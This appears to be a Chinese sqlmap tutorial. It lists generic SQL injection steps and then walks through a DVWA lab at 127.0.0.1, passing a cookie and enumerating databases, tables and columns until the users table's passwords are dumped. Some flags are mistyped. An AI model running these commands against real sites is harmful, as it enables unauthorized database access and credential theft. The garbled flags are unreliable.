sqlmap详细内容建议点击下方链接
sqlmap简介·下载及安装·sql使用参数详解·sqlmap进行sql注入常规使用步骤·常规细节知识点
使用sqlmap进行SQL注入的基本步骤
- 查看sqlmap相关参数,命令格式为:sqlmap -h
- 找到一个可利用的网址,判断网站数据库类型,命令格式为:sqlmap -u
- 确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap -u 目标网址–dbs
- 查看数据库中存在的表,命令格式为:sqlmap -u 目标网址–tables -D 数据库名
- 获取表中的字段,命令格式为:sqlmap -u 目标网址– columns -T 表名 -D 数据库名
- 猜解出字段,查看表里的存储内容,命令格式为:sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名
在这之前有几个小知识点
- sqlmap需要我们输入参数,其中最重要的参数是SQL注入的目标地址。首先要判断测试的目标地址是否需要登录,如果需要登录,则将登陆的Cookie作为参数传递给sqlmap。
- python sqlmap.py -u “目标地址” --cookie=“cookie值” --batch
- –batch用来指明自动化操作,否则每一个步骤都需要确认;
- –current-bd查看当前数据库名称
- -D DB 指定要枚举的 DBMS 数据库
- -T TBL 指定要枚举的 DBMS 数据表
- -C COL 指定要枚举的 DBMS 数据列
- -X EXCLUDECOL 指定要排除的 DBMS 数据列
- -U USER 指定枚举的 DBMS 用户
DVWA 之SQL Injection
-
先判断测试的目标网址是否需要登录,如果需要登录,将登录的cookie传给sqlmap
- 因为DVWA需要登录,所以需要将登陆的Cookie作为参数传递给sqlmap
- 输入user ID为1,然后用burpsuite进行拦截,得到cookie值
- 启动
python sqlmap.py
- 输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch
可以看到id处存在SQL注入
-
查看数据库信息
输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --dbs
-
查看当前数据库名称
输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch --current -db
可以看到当前数据库名称为dvwa -
查看数据库中的所有表
输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa --tables
-
查看dvwa数据库中users表中的字段
输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users --columns
-
将users表中的password和user字段的所有信息测试出来
输入python sqlmap.py -u “http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=hrv6mq4hkpul7c5iim0q8ar3b3” --batch -D dvwa -T users -C “user,password” --dump
得到用户名与密码